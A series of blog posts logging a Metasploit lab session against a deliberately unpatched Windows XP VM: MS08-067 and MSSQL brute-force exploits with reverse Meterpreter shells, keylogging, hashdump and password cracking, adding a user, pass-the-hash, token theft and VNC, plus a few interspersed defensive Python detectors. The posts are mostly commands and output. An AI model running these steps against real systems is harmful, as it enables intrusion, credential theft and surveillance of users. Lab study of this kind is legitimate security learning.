
Metasploit All-Ports Payloads: Brute Forcing Ports


I’m targeting ports on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 5 (The Joy of Exploitation) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The object of this is for Metasploit to uncover open ports on the victim machine. My input is in bold:

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > search ports
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/misc/wol normal UDP Wake-On-Lan (WOL)
auxiliary/admin/natpmp/natpmp_map normal NAT-PMP Port Mapper
auxiliary/admin/postgres/postgres_readfile normal PostgreSQL Server Generic Query
auxiliary/bnat/bnat_router normal BNAT Router
auxiliary/bnat/bnat_scan normal BNAT Scanner
auxiliary/scanner/http/apache_activemq_traversal normal Apache ActiveMQ Directory Traversal
auxiliary/scanner/http/vmware_server_dir_trav normal VMware Server Directory Traversal Vulnerability
auxiliary/scanner/http/wordpress_pingback_access normal WordPress Pingback Locator
auxiliary/scanner/misc/zenworks_preboot_fileaccess normal Novell ZENworks Configuration Management Preboot Service Remote File Access
auxiliary/scanner/natpmp/natpmp_portscan normal NAT-PMP External Port Scanner
auxiliary/scanner/portscan/ack normal TCP ACK Firewall Scanner
auxiliary/scanner/portscan/ftpbounce normal FTP Bounce Port Scanner
auxiliary/scanner/portscan/syn normal TCP SYN Port Scanner
auxiliary/scanner/portscan/tcp normal TCP Port Scanner
auxiliary/scanner/portscan/xmas normal TCP "XMas" Port Scanner
auxiliary/scanner/rservices/rexec_login normal rexec Authentication Scanner
auxiliary/scanner/rservices/rlogin_login normal rlogin Authentication Scanner
auxiliary/scanner/rservices/rsh_login normal rsh Authentication Scanner
auxiliary/scanner/scada/digi_realport_serialport_scan normal Digi RealPort Serial Server Port Scanner
auxiliary/scanner/snmp/snmp_enum normal SNMP Enumeration Module
auxiliary/scanner/vnc/vnc_login normal VNC Authentication Scanner
auxiliary/server/capture/mssql normal Authentication Capture: MSSQL
auxiliary/server/http_ntlmrelay normal HTTP Client MS Credential Relayer
exploit/linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
exploit/multi/browser/java_rhino 2011-10-18 excellent Java Applet Rhino Script Engine Remote Code Execution
exploit/multi/misc/hp_vsa_exec 2011-11-11 excellent HP StorageWorks P4000 Virtual SAN Appliance Command Execution
exploit/multi/misc/java_rmi_server 2011-10-15 excellent Java RMI Server Insecure Default Configuration Java Code Execution
exploit/windows/browser/adobe_flash_sps 2011-08-09 normal Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow
exploit/windows/browser/crystal_reports_printcontrol 2010-12-14 normal Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow
exploit/windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good Internet Explorer Tabular Data Control ActiveX Memory Corruption
exploit/windows/browser/ms10_042_helpctr_xss_cmd_exec 2010-06-09 excellent Microsoft Help Center XSS and Command Execution
exploit/windows/browser/ms11_093_ole32 2011-12-13 normal MS11-093 Microsoft Windows OLE Object File Handling Remote Code Execution
exploit/windows/browser/ms12_004_midi 2012-01-10 normal MS12-004 midiOutPlayNextPolyEvent Heap Overflow
exploit/windows/browser/ms12_037_same_id 2012-06-12 normal MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption
exploit/windows/browser/tom_sawyer_tsgetx71ex552 2011-05-03 normal Tom Sawyer Software GET Extension Factory Remote Code Execution
exploit/windows/fileformat/openoffice_ole 2008-04-17 normal OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow
exploit/windows/fileformat/ursoft_w32dasm 2005-01-24 good URSoft W32Dasm Disassembler Function Buffer Overflow
exploit/windows/http/apache_mod_rewrite_ldap 2006-07-28 great Apache module mod_rewrite LDAP protocol Buffer Overflow
exploit/windows/http/ca_totaldefense_regeneratereports 2011-04-13 excellent CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection
exploit/windows/http/savant_31_overflow 2002-09-10 great Savant 3.1 Web Server Overflow
exploit/windows/misc/allmediaserver_bof 2012-07-04 normal ALLMediaServer 0.8 Buffer Overflow
exploit/windows/mssql/mssql_linkcrawler 2000-01-01 great Microsoft SQL Server Database Link Crawling Command Execution
exploit/windows/mssql/mssql_payload_sqli 2000-05-30 excellent Microsoft SQL Server Payload Execution via SQL Injection
exploit/windows/novell/zenworks_preboot_op4c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
exploit/windows/novell/zenworks_preboot_op6c_bof 2012-02-22 normal Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
exploit/windows/scada/scadapro_cmdexe 2011-09-16 excellent Measuresoft ScadaPro <= 4.0.0 Remote Command Execution
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual Microsoft Workstation Service NetpManageIPCConnect Overflow
payload/windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager
payload/windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
payload/windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
payload/windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
payload/windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager
payload/windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager
payload/windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager
post/linux/gather/checkvm normal Linux Gather Virtual Environment Detection
post/linux/gather/enum_network normal Linux Gather Network Information
post/solaris/gather/checkvm normal Solaris Gather Virtual Environment Detection
post/windows/gather/checkvm normal Windows Gather Virtual Environment Detection
post/windows/manage/clone_proxy_settings normal Windows Manage Proxy Setting Cloner

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp_allports
PAYLOAD => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.70:1
msf exploit(ms08_067_netapi) > [*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

msf exploit(ms08_067_netapi) > sessions -1 -v

Active sessions
===============

Id Type Information Connection Via
-- ---- ----------- ---------- ---
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ LAB 192.168.1.70:1 -> 192.168.1.79:1053 (192.168.1.79) exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

This line:

[*] Meterpreter session 1 opened (192.168.1.70:1 -> 192.168.1.79:1053) at 2013-06-06 10:09:59 +0100

Shows me that my attacking machine is using port 1053 on the victim machine.
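The all-ports stager walks outbound ports on the handler address starting at LPORT (1 here) until one connects, which is why the handler above listens on port 1. Seen from an egress firewall, that is one internal host trying a run of consecutive ports against a single external host. The detection below is an added example, not code from the original post: it runs over constructed firewall-style log lines (src, dst, dport, action), and the field layout and the eight-port threshold are assumptions.

```python
"""Detect a sequential outbound port sweep against one destination, the
pattern an all-ports reverse stager leaves behind when it has to search
for an open egress port. Added example; the log lines are constructed."""
from collections import defaultdict

# Constructed firewall log: "src dst dport action" (assumed layout).
# One host walks ports 1..10 on a single peer and finally gets out on 443.
SAMPLE_LOG = """\
192.168.1.79 192.168.1.70 1 DENY
192.168.1.79 192.168.1.70 2 DENY
192.168.1.79 192.168.1.70 3 DENY
192.168.1.79 192.168.1.70 4 DENY
192.168.1.79 192.168.1.70 5 DENY
192.168.1.79 192.168.1.70 6 DENY
192.168.1.79 192.168.1.70 7 DENY
192.168.1.79 192.168.1.70 8 DENY
192.168.1.79 192.168.1.70 9 DENY
192.168.1.79 192.168.1.70 10 DENY
192.168.1.79 192.168.1.70 443 ALLOW
192.168.1.80 192.168.1.1 53 ALLOW
192.168.1.80 192.168.1.1 53 ALLOW
192.168.1.81 10.0.0.5 80 ALLOW
192.168.1.81 10.0.0.5 443 ALLOW
"""


def parse_log(text):
    """Yield (src, dst, dport, action); skip lines that do not fit the layout."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not parts[2].isdigit():
            continue
        src, dst, dport, action = parts
        yield src, dst, int(dport), action.upper()


def longest_run(ports):
    """Length of the longest run of consecutive ascending port numbers."""
    ports = sorted(set(ports))
    best = cur = 1 if ports else 0
    for prev, nxt in zip(ports, ports[1:]):
        cur = cur + 1 if nxt == prev + 1 else 1
        best = max(best, cur)
    return best


def find_port_sweeps(text, min_run=8):
    """Return {(src, dst): (run_length, allowed_ports)} for every pair whose
    outbound attempts contain at least min_run consecutive ports. The
    allowed ports tell a responder where the stage actually got through."""
    attempts = defaultdict(list)
    allowed = defaultdict(set)
    for src, dst, dport, action in parse_log(text):
        attempts[(src, dst)].append(dport)
        if action == "ALLOW":
            allowed[(src, dst)].add(dport)
    hits = {}
    for pair, ports in attempts.items():
        run = longest_run(ports)
        if run >= min_run:
            hits[pair] = (run, sorted(allowed[pair]))
    return hits


if __name__ == "__main__":
    for (src, dst), (run, ok) in find_port_sweeps(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {run} consecutive ports tried, egress on {ok}")
```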


Metasploit: Exploiting MS SQL Server: Fast-Track, mssql_ping, mssql_login, mssql_payload, Meterpreter Shell


I’m targeting the MS SQL Server on the Windows portion of my Virtual Hacking Lab and following instructions given in Chapter 6 (Meterpreter) of Metasploit: The Penetration Tester’s Guide.

The exploitee system comprises: Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First step: an Nmap scan from within Metasploit. The pertinent results for this exploit are:

1433/tcp open  ms-sql-s      Microsoft SQL Server 2005 9.00.1399.00

Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003

Interestingly, Nmap couldn’t definitively identify which Windows Service Pack, but of course I know it’s Service Pack 2.

MS SQL is installed by default on TCP port 1433 and UDP port 1434, so I need to confirm port 1434:

nmap -sU 192.168.1.79 -p1434

PORT STATE SERVICE
1434/udp open|filtered ms-sql-m

And the scan confirms this.

Now to use Metasploit mssql_ping to pick up more information:

msf > use scanner/mssql/mssql_ping
msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_ping) > set THREADS 20
THREADS => 20
msf auxiliary(mssql_ping) > exploit

[*] SQL Server information for 192.168.1.79:
[+] ServerName = LAB
[+] InstanceName = SQLEXPRESS
[+] IsClustered = No
[+] Version = 9.00.1399.06
[+] tcp = 1433
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
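mssql_ping gets those fields from the SQL Server Browser service, which answers a one-byte probe on UDP 1434 with a text record. The parser below is an added example, not Metasploit's code; it assumes the MS-SQLR framing (a 0x05 byte, a little-endian 16-bit length, then semicolon-separated key/value pairs with each instance closed by ";;") and builds a constructed response carrying the values shown above so that it runs offline.

```python
"""Parse SQL Server Browser (SSRP, UDP 1434) responses of the kind
mssql_ping reads. Added example, not Metasploit code. Framing assumed
from MS-SQLR: SVR_RESP = 0x05, RESP_SIZE (little-endian uint16), then
RESP_DATA as ASCII "key;value;" pairs with each instance closed by ";;"."""
import struct


def build_ssrp_response(instances):
    """Encode instance dicts the way the Browser service does. Used here
    only to construct offline sample input."""
    body = "".join(
        "".join(f"{k};{v};" for k, v in inst.items()) + ";" for inst in instances
    ).encode("ascii")
    return b"\x05" + struct.pack("<H", len(body)) + body


def parse_ssrp_response(packet):
    """Return a list of {field: value} dicts, one per advertised instance."""
    if len(packet) < 3 or packet[0] != 0x05:
        raise ValueError("not an SSRP SVR_RESP packet")
    (size,) = struct.unpack("<H", packet[1:3])
    data = packet[3:3 + size]
    if len(data) != size:
        raise ValueError(f"truncated response: header says {size}, got {len(data)}")
    instances = []
    for chunk in data.decode("ascii").split(";;"):
        if not chunk:
            continue
        fields = chunk.split(";")
        if len(fields) % 2:
            raise ValueError(f"odd field count in instance record {chunk!r}")
        instances.append(dict(zip(fields[0::2], fields[1::2])))
    return instances


def exposed_sql_endpoints(packet):
    """(ServerName, InstanceName, tcp port) for every instance the Browser
    service hands to an unauthenticated UDP client; this is the inventory a
    defender wants when deciding whether UDP 1434 should be reachable at all."""
    out = []
    for inst in parse_ssrp_response(packet):
        port = int(inst["tcp"]) if "tcp" in inst else None
        out.append((inst.get("ServerName"), inst.get("InstanceName"), port))
    return out


# Constructed response carrying the values mssql_ping reported above.
SAMPLE_RESPONSE = build_ssrp_response([{
    "ServerName": "LAB", "InstanceName": "SQLEXPRESS", "IsClustered": "No",
    "Version": "9.00.1399.06", "tcp": "1433",
}])

if __name__ == "__main__":
    for server, instance, port in exposed_sql_endpoints(SAMPLE_RESPONSE):
        print(f"{server}\\{instance} listening on tcp/{port}")
```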

Lots of information here, now to brute force MS SQL with mssql_login:

msf > use scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set PASS_FILE /usr/share/set/src/fasttrack/wordlist.txt
PASS_FILE => /usr/share/set/src/fasttrack/wordlist.txt
msf auxiliary(mssql_login) > set RHOSTS 192.168.1.79
RHOSTS => 192.168.1.79
msf auxiliary(mssql_login) > set THREADS 10
THREADS => 10
msf auxiliary(mssql_login) > exploit

[+] 192.168.1.79:1433 - MSSQL - successful login 'sa' : 'password1'

MS SQL password and login successfully guessed.

Now to use the mssql_payload which exploits xp_cmdshell:

msf > use windows/mssql/mssql_payload
msf exploit(mssql_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(mssql_payload) > set LPORT 443
LPORT => 443
msf exploit(mssql_payload) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(mssql_payload) > set PASSWORD password1
PASSWORD => password1
msf exploit(mssql_payload) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] The server may have xp_cmdshell disabled, trying to enable it...
[*] Command Stager progress - 1.47% done (1499/102246 bytes)

[....]

[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1293) at 2013-06-13 10:39:46 +0100

meterpreter >

So I’m inside the target machine with the Meterpreter shell.

In my next post I will explore what to do next with Meterpreter.

Metasploit Meterpreter Shell: Screenshot, sysinfo, ps, migrate, keylog_recorder


This post follows on from the previous post within which a target machine was exploited and a Meterpreter shell obtained.

First to export an image of the target machine’s desktop:

meterpreter > screenshot
Screenshot saved to: /root/hikMIGNN.jpeg

And here’s the result:

[Screenshot: hacked_desktop]

I must say seeing this was rather satisfying.

And now for system information:

meterpreter > sysinfo
Computer : LAB
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32

Perfect.

Listing the processes:

meterpreter > ps

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
544 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
572 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
596 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
668 1032 inetinfo.exe

[...]

1820  1772  explorer.exe              x86   0           LAB\Lab1                      C:\WINDOWS\Explorer.EXE

Now to “migrate” to explorer.exe:

meterpreter > migrate 1820
[*] Migrating from 3740 to 1820...
[*] Migration completed successfully.

Time for keystroke logging:

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against LAB
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
[*] Recording keystrokes...
^C[*] Saving last few keystrokes...
[*] Interrupt
[*] Stopping keystroke sniffer...

Whilst the keystroke logger was running I typed a few things on the target machine, and so in a new terminal, let’s see if the keystrokes have been logged:

:~# cat /root/.msf4/loot/20130613112010_default_192.168.1.79_host.windows.key_330924.txt
Keystroke log started at 2013-06-13 11:20:10 +0100
OK this search on Google is
to determine if the Metas
ploit keyy <Back> logger is wo
rking <Back> <Return> <Return> Is any of
this being typed in Notepad
being recorded on the attacki <Back>
ng machine? <Return> <Return> Don't know yet
, but will find out in a min! <Return> <Return>

Success, every keystroke on the target machine has indeed been recorded on the attacking machine.

Metasploit Meterpreter: Dumping Username and Password Hashes – hashdump


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

And so to the Meterpreter:

meterpreter > use priv <-- To run as privileged account
[-] The 'priv' extension has already been loaded.
meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes…
Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:6b07ba3b4d75aa51838b0cfdc86c8df3:e45fffac3de66133d18d22904c5826cf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0eed33aba5c1d0b4380877fc6a9d3782:::
Lab1:1003:120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6:::
IUSR_LAB:1004:62370555cf8f248a0e09beb9498d8aef:e3f63f5c44a2d1b51f41605f8b393f9a:::
IWAM_LAB:1005:f36ec01c239defaaf55c7c89733523b1:5a0701b3aada738fcca9bec7d5de30a5:::
ASPNET:1006:7287a164a7e06a495f8d3fe3df15c6f4:44919150091298dd9585de0e598750a2:::
__vmware_user__:1013:aad3b435b51404eeaad3b435b51404ee:bb971f73d6fd552502d31ee0ba49d197:::

Hash beginning aad3b435 is an empty string.

I copied the Administrator’s Windows LAN Manager (LM) password hash (81cbcea8a9af93bbaad3b435b51404ee) and decrypted it, and was rewarded with “S3CR3T”, which is indeed the correct password!

I did the same as above with the LAB1 LM hash (120fafeb2e7c7e58944e2df489a880e4) on a different website, as the first website was unable to decrypt it, and again was rewarded with “WHATEVER”, which is the correct password.

Interestingly, when I entered the second password hash (NTLM) of LAB1 (e653e6452753c97e46792567dff599b6) the first website decrypted it fine.
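The dump above is in pwdump format (user:RID:LM hash:NT hash:::). The script below is an added example, not Metasploit code, that audits such lines from the defender's side: it flags blank passwords (the NT hash of the empty string, which is Guest's value above), accounts still storing an LM hash at all (the NoLMHash policy is not in force on the host), and LM hashes whose second half is the empty-string constant the author notes (aad3b435b51404ee), which the LM scheme produces whenever the password is seven characters or fewer. The sample lines are copied from the output above.

```python
"""Audit pwdump-format hashdump lines for weak password storage.
Added example (not Metasploit code). Sample lines are copied from the
hashdump output in the post above."""

# DES of the LM constant under an all-zero key: the LM half produced by an
# empty (or absent) 7-byte password block. The author notes this value above.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
# MD4 of the empty UTF-16LE string: the NT hash of a blank password
# (Guest's NT hash in the dump above).
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

HASHDUMP = """\
Administrator:500:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:6b07ba3b4d75aa51838b0cfdc86c8df3:e45fffac3de66133d18d22904c5826cf:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0eed33aba5c1d0b4380877fc6a9d3782:::
Lab1:1003:120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6:::
IUSR_LAB:1004:62370555cf8f248a0e09beb9498d8aef:e3f63f5c44a2d1b51f41605f8b393f9a:::
IWAM_LAB:1005:f36ec01c239defaaf55c7c89733523b1:5a0701b3aada738fcca9bec7d5de30a5:::
ASPNET:1006:7287a164a7e06a495f8d3fe3df15c6f4:44919150091298dd9585de0e598750a2:::
__vmware_user__:1013:aad3b435b51404eeaad3b435b51404ee:bb971f73d6fd552502d31ee0ba49d197:::
"""

HEX = set("0123456789abcdef")


def parse_pwdump(text):
    """Yield (name, rid, lm, nt) for each well-formed pwdump line."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"line {lineno}: expected user:rid:lm:nt, got {line!r}")
        name, rid, lm, nt = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        if (not rid.isdigit() or len(lm) != 32 or len(nt) != 32
                or not set(lm) <= HEX or not set(nt) <= HEX):
            raise ValueError(f"line {lineno}: malformed fields in {line!r}")
        yield name, int(rid), lm, nt


def audit_hashdump(text):
    """Map each account to a list of findings (empty list = nothing to flag)."""
    findings = {}
    for name, rid, lm, nt in parse_pwdump(text):
        issues = []
        if nt == EMPTY_NT:
            issues.append("blank password")
        if lm != EMPTY_LM:
            # Any real LM hash means LM storage is still enabled on this host.
            issues.append("LM hash stored")
            if lm[16:] == EMPTY_LM_HALF:
                # The second DES block covered only null padding, so the
                # (case-folded) password fits in the first 7 characters.
                issues.append("password is 7 characters or fewer")
        if rid == 500 and issues:
            issues.append("built-in Administrator affected")
        findings[name] = issues
    return findings


if __name__ == "__main__":
    for account, issues in audit_hashdump(HASHDUMP).items():
        print(f"{account:18} {', '.join(issues) or 'ok'}")
```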

In the output above it’s noted: “No users with password hints on this system” and so I set a “hint” and reran the scan:

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY ec2d41aa4579441e29ff2f7c166c0a22...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

Lab1:"My feet smell"

And there’s the password hint: “My feet smell”.

Metasploit Meterpreter: Creating a new user in an exploited Windows XP System


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

The first step is to “migrate” to explorer.exe, as was achieved in a previous post:

meterpreter > migrate 2028

[*] Migrating from 3180 to 2028...
[*] Migration completed successfully.

Now to create a new user on the exploited Windows system:

meterpreter > shell
Process 3092 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>net user bob password123 /add

Result:

net user bob password123 /add
The command completed successfully.

And here’s a screenshot taken from the attacking machine:

[Screenshot: adding_user]

And there is the new user “Bob” created entirely from the hacking machine.


Metasploit: Pass the Hash – windows/smb/psexec


Probably my favourite blog title so far.

Following on from the Hashdump post in which I obtained the Windows passwords in the form of hashes and then decrypted them for the password, the following uses the hashes to login without the need for decryption:

msf > use windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(psexec) > set LPORT 443
LPORT => 443
msf exploit(psexec) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(psexec) > set SMBPass 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
SMBPass => 120fafeb2e7c7e58944e2df489a880e4:e653e6452753c97e46792567dff599b6
msf exploit(psexec) > exploit

[*] Started reverse handler on 192.168.1.70:443
[*] Connecting to the server...
[*] Authenticating to 192.168.1.79:445|WORKGROUP as user ''...
[-] Exploit failed [no-access]: Rex::Proto::SMB::Exceptions::LoginError Login Failed: The server responded with error: STATUS_LOGON_FAILURE (Command=115 WordCount=0)

As you can see this completely failed, which did not take me by surprise since every time I have attempted to use the SMB command against this Windows system, it has failed.

No idea why.

Metasploit Meterpreter: Using ps and stealing Kerberos tokens


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

meterpreter > ps <-- Lists applications running

Process List
============

PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
192 1032 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
468 1032 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
512 1032 vmnat.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnat.exe
536 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
580 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
588 1032 vmnetdhcp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\vmnetdhcp.exe
680 1032 vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\VMware\VMware Player\vmware-authd.exe
696 1032 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
788 128 explorer.exe x86 0 LAB\Lab1 C:\WINDOWS\Explorer.EXE
860 536 wscntfy.exe x86 0 LAB\Lab1 C:\WINDOWS\system32\wscntfy.exe
892 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
964 892 csrss.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
988 892 winlogon.exe x86 0 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
1032 988 services.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
1044 988 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
1216 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1272 1032 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr
1460 1032 sqlbrowser.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
1508 1032 vmware-usbarbitrator.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\VMware\USB\vmware-usbarbitrator.exe
1652 1032 spoolsv.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1928 1032 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
1968 1032 sqlservr.exe x86 0 NT AUTHORITY\SYSTEM c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
2080 788 hqtray.exe x86 0 LAB\Lab1 C:\Program Files\VMware\VMware Player\hqtray.exe
2424 2396 ACpwO.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\TEMP\ACpwO.exe
3376 1032 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe

I’ve decided to steal the PID token for the user LAB1 (1436 988 logon.scr x86 0 LAB\Lab1 C:\WINDOWS\System32\logon.scr)

meterpreter > steal_token 1436
Stolen token with username: LAB\Lab1

I believe I have now assumed the role of LAB1 and Meterpreter is running under the context of that user.


Metasploit Meterpreter: Run VNC


This follows on from a previous post within which a target machine was exploited and a Meterpreter shell obtained. Details of the exploited machine are:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

This is very cool. The following installs a VNC session on the exploited Windows system and gives me a graphical interface window of the target desktop to manipulate as if I were sitting at the machine.

meterpreter > run vnc
[*] Creating a VNC reverse tcp stager: LHOST=192.168.1.70 LPORT=4545)
[*] Running payload handler
[*] VNC stager executable 73802 bytes long
[*] Uploaded the VNC agent to C:\WINDOWS\TEMP\nMsMIPZFPZ.exe (must be deleted manually)
[*] Executing the VNC agent with endpoint 192.168.1.70:4545...
